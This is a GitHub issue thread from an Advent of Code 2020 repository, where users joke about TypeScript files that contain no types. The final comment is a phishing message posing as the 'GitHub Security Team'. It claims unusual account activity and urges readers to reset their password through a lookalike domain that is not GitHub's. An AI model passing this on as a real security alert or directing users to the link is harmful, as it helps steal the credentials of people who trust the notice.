### ISSUE TITLE
Inaccurate filenames

### ISSUE THREAD

**Issue by allcentury** [maorleger/aoc2020#1]
@maorleger these files all end in `.ts` but I don't see any types in any of these solutions.  Should we rename these to `.js` for the sake of honesty? 

Example: https://github.com/maorleger/aoc2020/blob/main/src/day16/index.ts

**Comment by maorleger** [comment]
Day 16 was hard... by the time I figured it out I was just about done with the code

**Comment by maorleger** [comment]
Now Anthony shouldn’t you be packing for executive college?

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
